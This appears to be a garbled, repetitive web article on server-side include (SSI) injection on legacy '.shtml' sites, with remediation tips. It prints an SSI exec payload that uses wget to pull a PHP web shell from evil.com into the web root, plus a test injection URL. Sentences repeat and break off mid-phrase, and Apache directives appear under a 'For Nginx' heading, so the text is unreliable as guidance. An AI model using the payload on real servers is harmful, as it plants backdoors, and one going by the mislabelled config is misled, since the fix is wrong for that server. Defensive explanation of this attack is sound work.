The attacker then injects a malicious SSI directive into the file. A common payload: <!--#exec cmd="wget http://evil.com/shell.txt -O /home/public/shell.php" --> This downloads a PHP web shell (often named something innocuous like image.php or css.php ).
They test for SSI injection by passing a parameter, e.g.,: https://www.target-motel.com/view/index.shtml?page=<!--#echo var="DATE_LOCAL" --> If the server returns the current date/time, the attacker confirms they can execute SSI directives. inurl view index shtml motel fix
For Nginx:
cd /var/www/html/
# Disable SSI execution for all .shtml files Options -Includes <FilesMatch ".shtml$"> SSILegacyExprParser off # Remove exec capability <IfModule mod_include.c> SSIEnableCmdExec off </IfModule> </FilesMatch> The attacker then injects a malicious SSI directive
At first glance, it reads like gibberish—a mix of a Google search operator ( inurl: ), a file path ( view/index.shtml ), a random word ( motel ), and a desperate plea ( fix ). However, this string is a . It represents one of the most persistent, low-level website defacement and backdoor patterns from the mid-2000s that still plagues legacy servers today. For Nginx: cd /var/www/html/ # Disable SSI execution
crontab -l Search for wget, curl, or php commands that run frequently. Delete any that you did not add. This vulnerability exists because your server executes SSI commands from user input. Here is how to kill it forever.